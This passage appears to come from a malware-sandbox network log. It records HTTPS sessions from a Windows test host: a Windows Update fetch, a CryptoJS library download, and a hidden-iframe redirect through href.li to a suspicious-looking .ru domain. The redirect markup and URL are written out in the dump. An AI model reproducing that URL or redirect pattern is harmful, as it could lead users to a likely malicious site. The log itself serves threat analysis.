                                                                                  Data Ascii: S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51])


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.44973913.85.23.86443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:36 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6cpszyOxeMS9Ozg&MD=OVEsnKgD HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                  Host: slscr.update.microsoft.com
                                                                                  2024-10-02 15:49:36 UTC560INHTTP/1.1 200 OK
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Content-Type: application/octet-stream
                                                                                  Expires: -1
                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                  MS-CorrelationId: 97d6a048-a538-42ad-8bb0-bf726ffc5e52
                                                                                  MS-RequestId: 8444562f-2059-4561-bba8-58b511aa7197
                                                                                  MS-CV: DwC+6P3wvkGVsxVs.0
                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Date: Wed, 02 Oct 2024 15:49:35 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 24490
                                                                                  2024-10-02 15:49:36 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                  2024-10-02 15:49:36 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449745104.17.24.144433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:36 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                  Host: cdnjs.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:36 UTC932INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:36 GMT
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: public, max-age=30672000
                                                                                  ETag: W/"61182885-40eb"
                                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Timing-Allow-Origin: *
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 495678
                                                                                  Expires: Mon, 22 Sep 2025 15:49:36 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2ByF7e6ZzziORdj5R6N88xb9SK2M6B0SqVMZBvjeV%2FZ%2FOdV9Z2tE7wuBr076l4BW3V4%2FX%2FtiNcpsVvQvYxsMknnAPq0yAGqynYMBOkfA0FgH4WbZ8mqJMRdSXL9ZbZxGhlsjsYEZH"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d7e74cbb0f74-EWR
                                                                                  2024-10-02 15:49:36 UTC437INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                  Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70
                                                                                  Data Ascii: ypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.p
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 28 34
                                                                                  Data Ascii: his.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28
                                                                                  Data Ascii: ._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33 30 39
                                                                                  Data Ascii: ;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+88626309
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d 3c 3c
                                                                                  Data Ascii: +e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64
                                                                                  Data Ascii: ):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.word
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71
                                                                                  Data Ascii: =t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopq
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d 74 5b
                                                                                  Data Ascii: extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[
                                                                                  2024-10-02 15:49:36 UTC1369INData Raw: 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31
                                                                                  Data Ascii: C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.449747192.0.78.274433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:38 UTC684OUTGET /?https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/ HTTP/1.1
                                                                                  Host: href.li
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:38 UTC279INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 02 Oct 2024 15:49:38 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Vary: Accept-Encoding
                                                                                  X-ac: 2.jfk _dfw MISS
                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                  2024-10-02 15:49:38 UTC550INData Raw: 32 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 68 72 65 66 2e 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 39 7a 67 2e 61 66 6f 72 65 6e 6f 74 65 64 63 2e 72 75 2f 6f 42 56 62 6f 42 44 5a 6f 45 38 6e 6e 39 4c 6e 70 38 65 42 73 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77
                                                                                  Data Ascii: 21a<!DOCTYPE html><html><head><title>href.li</title><meta http-equiv="Refresh" content="0; url=https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/" /><meta name="referrer" content="no-referrer" /><script type="text/javascript">/* <![CDATA[ */window


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.449751172.67.214.1834433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:39 UTC667OUTGET /oBVboBDZoE8nn9Lnp8eBs/ HTTP/1.1
                                                                                  Host: 9zg.aforenotedc.ru
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:41 UTC1024INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNhFvJYXwi9jz37MvvPp5Wgu8GYbazTvYnCDvh1eI%2BK9eSZIX%2FORgEWtnkaS0wlouzt%2BHQjl0GVmnu4fLgWtkMInEegV%2BUNrIK%2FgmN5p2%2FcuFNjPQFgh8zJdNmZLVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Speculation-Rules: "/cdn-cgi/speculation"
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IjZBQjhWM0lOU3FNNTNuT2pleUF5ZkE9PSIsInZhbHVlIjoidnQ0Ymh3dGRVU0lLTzNJanJqMkp4cU8xazZrd21IQkpFelFLZFhBREFkWDZTZzRlWTNRalJ3b0lLdWZzcEdKVktkNjczNGYyeTVaMmJJSVlQZ2huTm4xWFdTTW1yV1ZpVDJDZ3RTOXFCNmxUeGZBQUtnbXl6dWRTd2xiWm9aT1IiLCJtYWMiOiJlNjM2MDM1MTg3Yjc4YTQzM2EyM2E0ZTJhZDEyODA1M2ViZTIzM2UxNDg1YWU3NGQ2ZTQxYjdmYTZiM2JjMzRlIiwidGFnIjoiIn0%3D; expires=Wed, 02-Oct-2024 17:49:41 GMT; Max-Age=7200; path=/; secure; samesite=none
